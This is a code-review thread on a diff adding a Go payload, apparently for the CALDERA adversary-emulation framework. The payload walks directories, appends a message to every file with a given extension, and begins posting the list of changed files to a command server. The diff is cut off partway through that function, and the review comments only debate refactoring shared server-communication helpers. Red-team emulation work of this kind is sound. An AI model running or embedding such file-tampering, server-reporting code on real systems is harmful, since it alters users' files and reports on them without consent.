payloads/mission.go

```diff
@@ -0,0 +1,120 @@
+package main
+
+import (
+	"bytes"
+	"encoding/base64"
+	"encoding/json"
+	"flag"
+	"fmt"
+	"io/ioutil"
+	"log"
+	"net/http"
+	"os"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"time"
+)
+
+var modifiedFiles map[string]bool
+
+func getFiles(searchpath string, extension string) []string {
+	var files []string
+	err := filepath.Walk(searchpath, func(path string, info os.FileInfo, err error) error {
+		if filepath.Ext(path) == extension {
+			files = append(files, path)
+		}
+		return nil
+	})
+	if err != nil {
+		panic(err)
+	}
+	return files
+}
+
+func findNewFiles(files []string) []string {
+	var filesToModify []string
+	for _, file := range files {
+		_, alreadyModified := modifiedFiles[file]
+		if alreadyModified == false {
+			modifiedFiles[file] = true
+			filesToModify = append(filesToModify, file)
+		}
+	}
+	return filesToModify
+}
+
+func modifyFiles(files []string, message string) []string {
+	var successfulFiles []string
+	for _, f := range files {
+		file, err := os.OpenFile(f, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
+		defer file.Close()
+		if err != nil {
+			log.Println(err)
+		}
+		if _, err := file.WriteString(message); err != nil {
+			log.Println(err)
+		} else {
+			successfulFiles = append(successfulFiles, f)
+		}
+	}
+	return successfulFiles
+}
+
+func postResults(server string, files []string) {
+	address := fmt.Sprintf("%s/sand/results", server)
```

Comment:
what are your thoughts on this... good programming practice is to break out functionality into bite-sized pieces (like you are doing with the postResults, request, encode and decode functions). do you think it'd be worthwhile to make 1 function out of these called "sendToServer(...)"? the only reason I'd think about doing that, is it could be an easy function to copy over to other missions which would all want it..... what do you think?

Reply:
the "right" best long-term move would be to make a small library (caldera.go) that any golang mission could use. but I could go either way on this sort of thing. curious your thoughts.

Reply:
I think that a small library is the way to go... Sandcat has a util.go file that I basically lifted these functions from. Would there be a way to have Sandcat and mission both use the util library without us having to copy (and edit) the file to multiple spots in the REPO

Reply:
yep, there are a few ways we could do that... the primary thing is creating the *.go file and ensuring all "main" go files (like mission.go and sandcat.go) import it. then they'll always compile with the library inside. 

I think keeping it as-is for now is prob the right move. then when we add the next go mission, we should look at creating this library. the only challenge with creating it, is where do you put the library (payloads? which plugin? etc). and how do we decide which main go files should import it.

Reply:
Sounds good!